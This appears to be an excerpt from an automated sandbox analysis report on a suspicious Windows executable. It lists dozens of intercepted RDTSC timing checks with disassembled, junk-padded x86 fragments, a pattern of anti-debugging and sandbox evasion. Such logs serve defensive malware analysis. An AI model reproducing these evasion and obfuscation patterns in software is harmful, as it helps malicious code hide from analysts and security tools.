                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BEE84C second address: BEE850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BF02F6 second address: BF0322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007FF3D0D8173Ch 0x00000011 pop ebx 0x00000012 jmp 00007FF3D0D8173Bh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BF0322 second address: BF0327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: BF0327 second address: BF032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B06A82 second address: B06A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B06A88 second address: B06A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 49F041A second address: 49F0473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, 3ADD68E8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov bh, ah 0x00000011 mov ecx, edi 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 movsx edx, si 0x00000019 pushfd 0x0000001a jmp 00007FF3D0F68BAAh 0x0000001f xor cl, 00000048h 0x00000022 jmp 00007FF3D0F68BABh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b jmp 00007FF3D0F68BB6h 0x00000030 mov edx, dword ptr [ebp+0Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 movsx ebx, ax 0x00000039 movzx esi, dx 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 49F0473 second address: 49F0479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 49F0479 second address: 49F047D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 49F047D second address: 49F0481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 49F04AD second address: 49F04B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 49F04B1 second address: 49F04B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 49F04B5 second address: 49F04BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10731 second address: 4A1076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF3D0D8173Fh 0x00000008 pop ecx 0x00000009 jmp 00007FF3D0D81749h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bx, 43AEh 0x00000019 mov eax, ebx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A1076B second address: 4A10786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10786 second address: 4A1078A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A1078A second address: 4A10790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10790 second address: 4A107A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0D81742h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A107A6 second address: 4A10836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF3D0F68BB6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 jmp 00007FF3D0F68BAEh 0x00000019 mov ch, 38h 0x0000001b popad 0x0000001c push esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF3D0F68BB8h 0x00000024 add ah, 00000048h 0x00000027 jmp 00007FF3D0F68BABh 0x0000002c popfd 0x0000002d call 00007FF3D0F68BB8h 0x00000032 mov esi, 40E34DC1h 0x00000037 pop eax 0x00000038 popad 0x00000039 mov dword ptr [esp], ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov di, E1D8h 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10836 second address: 4A10876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 jmp 00007FF3D0D81748h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 jmp 00007FF3D0D8173Eh 0x00000015 mov bl, ah 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov di, FBACh 0x00000020 movsx ebx, si 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10876 second address: 4A10898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10898 second address: 4A1089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A1089C second address: 4A108B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A108B7 second address: 4A10914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 pushfd 0x00000011 jmp 00007FF3D0D81749h 0x00000016 jmp 00007FF3D0D8173Bh 0x0000001b popfd 0x0000001c popad 0x0000001d nop 0x0000001e pushad 0x0000001f mov esi, 0E9467FBh 0x00000024 mov bx, cx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10914 second address: 4A10918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10918 second address: 4A1092E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A1092E second address: 4A10955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF3D0F68BB5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10955 second address: 4A1095B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A1095B second address: 4A1095F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10A33 second address: 4A10A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF3D0D8173Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10A61 second address: 4A001A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov eax, 68289243h 0x00000010 pushfd 0x00000011 jmp 00007FF3D0F68BB8h 0x00000016 and ah, 00000008h 0x00000019 jmp 00007FF3D0F68BABh 0x0000001e popfd 0x0000001f popad 0x00000020 leave 0x00000021 jmp 00007FF3D0F68BB6h 0x00000026 retn 0004h 0x00000029 nop 0x0000002a sub esp, 04h 0x0000002d xor ebx, ebx 0x0000002f cmp eax, 00000000h 0x00000032 je 00007FF3D0F68D0Ah 0x00000038 mov dword ptr [esp], 0000000Dh 0x0000003f call 00007FF3D5034EE3h 0x00000044 mov edi, edi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A001A9 second address: 4A001AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A001AD second address: 4A0020F instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FF3D0F68BAEh 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 mov bx, F0F0h 0x00000018 movsx ebx, ax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f mov edi, ecx 0x00000021 pushfd 0x00000022 jmp 00007FF3D0F68BAAh 0x00000027 and eax, 427BE938h 0x0000002d jmp 00007FF3D0F68BABh 0x00000032 popfd 0x00000033 popad 0x00000034 sub esp, 2Ch 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF3D0F68BB5h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0020F second address: 4A00215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00215 second address: 4A00219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A003C4 second address: 4A003CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A003CA second address: 4A003CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A003CE second address: 4A00453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c jmp 00007FF3D0D8173Eh 0x00000011 test al, al 0x00000013 pushad 0x00000014 mov bx, cx 0x00000017 call 00007FF3D0D8173Ah 0x0000001c pushfd 0x0000001d jmp 00007FF3D0D81742h 0x00000022 and cl, FFFFFFA8h 0x00000025 jmp 00007FF3D0D8173Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d je 00007FF3D0D818F7h 0x00000033 jmp 00007FF3D0D8173Fh 0x00000038 lea ecx, dword ptr [ebp-14h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF3D0D81745h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A004FA second address: 4A00527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF3D0F68BADh 0x00000013 pop eax 0x00000014 movsx ebx, ax 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00527 second address: 4A0052C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0052C second address: 4A00568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jg 00007FF441956AFFh 0x0000000d jmp 00007FF3D0F68BB0h 0x00000012 js 00007FF3D0F68C42h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF3D0F68BB7h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00568 second address: 4A005CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 16FAh 0x00000007 pushfd 0x00000008 jmp 00007FF3D0D8173Bh 0x0000000d or eax, 07680A9Eh 0x00000013 jmp 00007FF3D0D81749h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c cmp dword ptr [ebp-14h], edi 0x0000001f jmp 00007FF3D0D8173Eh 0x00000024 jne 00007FF44176F622h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF3D0D81747h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A005CE second address: 4A0060C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov cl, B1h 0x0000000f call 00007FF3D0F68BB9h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0060C second address: 4A0062F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 lea eax, dword ptr [ebp-2Ch] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3D0D81748h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0062F second address: 4A00634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00634 second address: 4A006F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF3D0D81742h 0x00000012 sbb esi, 7C060548h 0x00000018 jmp 00007FF3D0D8173Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF3D0D81748h 0x00000024 sbb si, C7A8h 0x00000029 jmp 00007FF3D0D8173Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dx, si 0x00000033 popad 0x00000034 mov dword ptr [esp], esi 0x00000037 jmp 00007FF3D0D81742h 0x0000003c nop 0x0000003d jmp 00007FF3D0D81740h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov al, 95h 0x00000048 pushfd 0x00000049 jmp 00007FF3D0D81749h 0x0000004e and eax, 19C38BD6h 0x00000054 jmp 00007FF3D0D81741h 0x00000059 popfd 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A006F3 second address: 4A00703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00703 second address: 4A00707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00707 second address: 4A00760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF3D0F68BADh 0x00000010 sub ah, FFFFFFE6h 0x00000013 jmp 00007FF3D0F68BB1h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FF3D0F68BAAh 0x00000020 push eax 0x00000021 jmp 00007FF3D0F68BABh 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007FF3D0F68BABh 0x0000002f pop ecx 0x00000030 mov cx, di 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00772 second address: 4A00778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00778 second address: 4A007B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF3D0F68BB3h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e pushad 0x0000000f mov ebx, ecx 0x00000011 mov edx, eax 0x00000013 popad 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF3D0F68BB5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A007B3 second address: 4A00025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF44176F5C3h 0x0000000f xor eax, eax 0x00000011 jmp 00007FF3D0D5AE6Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp esi, 00000000h 0x00000028 je 00007FF3D0D81875h 0x0000002e call 00007FF3D4E4D77Ch 0x00000033 mov edi, edi 0x00000035 pushad 0x00000036 mov di, F746h 0x0000003a mov edx, 0CDB41D2h 0x0000003f popad 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF3D0D81745h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00025 second address: 4A000EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF3D0F68BB3h 0x00000013 xor ecx, 4F1AA3DEh 0x00000019 jmp 00007FF3D0F68BB9h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 jmp 00007FF3D0F68BACh 0x00000028 pushfd 0x00000029 jmp 00007FF3D0F68BB2h 0x0000002e xor cx, 9B08h 0x00000033 jmp 00007FF3D0F68BABh 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ecx 0x0000003b jmp 00007FF3D0F68BB6h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov ax, 4E03h 0x00000048 pushfd 0x00000049 jmp 00007FF3D0F68BB8h 0x0000004e adc ah, FFFFFFC8h 0x00000051 jmp 00007FF3D0F68BABh 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A000EF second address: 4A00107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0D81744h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00107 second address: 4A0010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0010B second address: 4A0011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0011A second address: 4A0011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A0011E second address: 4A00122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00122 second address: 4A00128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00BEA second address: 4A00C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d jmp 00007FF3D0D81742h 0x00000012 popad 0x00000013 cmp dword ptr [7544459Ch], 05h 0x0000001a jmp 00007FF3D0D81740h 0x0000001f je 00007FF44175F514h 0x00000025 jmp 00007FF3D0D81740h 0x0000002a pop ebp 0x0000002b pushad 0x0000002c pushad 0x0000002d mov edi, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00C5D second address: 4A00C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 33B9BD5Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3D0F68BACh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A00D49 second address: 4A00DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov edi, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test al, al 0x0000000c jmp 00007FF3D0D81748h 0x00000011 je 00007FF44175534Eh 0x00000017 pushad 0x00000018 call 00007FF3D0D8173Eh 0x0000001d mov bl, cl 0x0000001f pop ebx 0x00000020 pushfd 0x00000021 jmp 00007FF3D0D8173Ch 0x00000026 sub esi, 2845C278h 0x0000002c jmp 00007FF3D0D8173Bh 0x00000031 popfd 0x00000032 popad 0x00000033 cmp dword ptr [ebp+08h], 00002000h 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FF3D0D81744h 0x00000041 jmp 00007FF3D0D81745h 0x00000046 popfd 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10AE1 second address: 4A10AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10AE7 second address: 4A10B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10B00 second address: 4A10B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10B1C second address: 4A10B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF3D0D81741h 0x00000009 sbb ch, 00000046h 0x0000000c jmp 00007FF3D0D81741h 0x00000011 popfd 0x00000012 mov si, 20F7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b call 00007FF3D0D81744h 0x00000020 movzx ecx, dx 0x00000023 pop edx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FF3D0D8173Ah 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov di, ax 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: 4A10B7B second address: 4A10BDE instructions: 0x00000000 rdtsc 0x00000002 mov dh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF3D0F68BB5h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FF3D0F68BB1h 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, dx 0x00000019 pushfd 0x0000001a jmp 00007FF3D0F68BAFh 0x0000001f and ah, FFFFFF9Eh 0x00000022 jmp 00007FF3D0F68BB9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
